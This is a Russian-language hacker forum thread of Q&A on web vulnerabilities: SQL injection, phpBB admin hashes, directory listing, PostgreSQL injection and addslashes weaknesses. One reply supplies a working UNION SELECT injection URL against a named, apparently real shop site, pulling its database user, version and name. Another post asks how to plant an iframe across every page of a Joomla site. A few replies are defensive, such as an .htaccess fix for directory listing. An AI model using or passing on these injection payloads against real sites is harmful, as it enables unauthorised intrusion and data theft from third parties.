Ваши вопросы по уязвимостям.

2 tor4)
Скорее всего дефолтное имя столбца изменено, а вообще, нах тебе username ? Тебе же скорее всего админский хэш нужен, а он самый первый в таблице.
Кста, какой error выпадает ?

 

error: [an error occurred while processing this directive]

админский хэш но логины стандартные не катят)

 

Если пхпбб, зачем тебе логины подбирать, просто зайди www.site.com/forum/profile.php?mode=viewprofile&u=2

 

Спасибо всем, отдельное спасибо jokester. надо было по играть с limit както забыл совсем))

 

как произвести иньекцию в PostgreSQL?

 

sabe,
http://www.linuxshare.ru/postgresql/manual/index.html
postgresql.ru.net/docs.shtml
http://resurection.ru/doc/postgres/

 

2 sabe
ИМХО там нет инъекции, ругается на данные и всё

 

Joomla

Народ , кто подскажет , куда в админке joomla поставить ифрейм , чтоб на всех страничка он был ?
Спасибо !

 

2Xszz
forum.antichat.ru/thread70944.html

 

я тут недано, и у меня есть вопрос: у нас сайт давно висит и иногда стали приходить разные заказы - там один код, видимо что-то пробовали, а посмотрел и нашел что по адресу site.ru/site/ можно посмотреть все файлы, что из этого могут извлечь и чем грозит???

 

Они могут только список файлов просмотреть, или и читать что в файлах скриптов (к примеру .php)? Как простейший вариант - могут утянуть дамп БД, т.к. будут знать где лежит (если есть).

В любом случае лучше закрыть.

 

Qwazar, я думаю, ты ошибаешься.

hall, если там просто листинг, то макисмум это грозит тем, что пользователь узнает где и как лежат твои файлы. PHP в этом случае он читать не может, ну если конечно сервер настроен на исполнение .php файлов, как php кода)

Чтобы это исправить напиши небольшой .htaccess файл:

Code:

Options -Indexes
#дальше просто для верности :)
IndexIgnore *

 

не получается подобрать количество полей, все время ошибка. как быть ? _http://www.pvp.kiev.ua/price?id_group=227'

 

Про то что можно ли читать файлы, это я вопрос задал

Сдаётся мне ты ничего вытянуть не сможешь, т.к. кавычки/слеши экранируются.

 

Qwazar, а, тогда извиняюсь Ну я ответил)

 

>> Сдаётся мне ты ничего вытянуть не сможешь, т.к. кавычки/слеши экранируются.
Не в фильтрации дело. Просто видно каким то хитрожопым способом составлен запрос, и часть запроса после инъекции не отрезается комментариями.

 

2 cheb
В этом параметре нет инъекции.Т.е. нет возможности влиять на запрос

Посмотри сам id_group=227 вывод "группа МФУ"
id_group=226 вывод "группа ноутбуки"
id_group=227-1 вывод "группа МФУ"

Если нужна инъекция на этом сайте вот она :

http://www.pvp.kiev.ua/price?id_group=244&id_price=-14141+union+select+1,2,3,4,5,concat(user(),char(58),version(),char(58),database()),7,8,9,0,11,12,13,14--

ветка пятая ,дальше сам если нужно

 

а если просто в каждой папке сделать файл index.html
и все, при обращении к папке этот файл же автоматически должен загружаться, тогда и файлы неувидишь... поправьте если мой способ неэффективен...

 

hall, эффективен, но более, как бы сказать...дедовский, что ли)) Вариант с .htaccess'ом более практичен и прост (по крайней мере для меня)

 

Почему советуют использовать
mysql_real_escape_string()
или mysql_escape_string()
а не addslashes()?

Можно ли воспользоватся тем что используется addslashes()?

'SELECT `username` FROM `member` WHERE `id` = \' '. addslashes($str) .' \'

хммм

сделал

$a = "\x1a";

echo "slesh ".addslashes($a).'<br>';
echo "mysql ".mysql_real_escape_string($a);

результат

slesh 
mysql \Z

В 1ом слэш не добввился просто
а во 2ом не понел откуда \Z взялось oO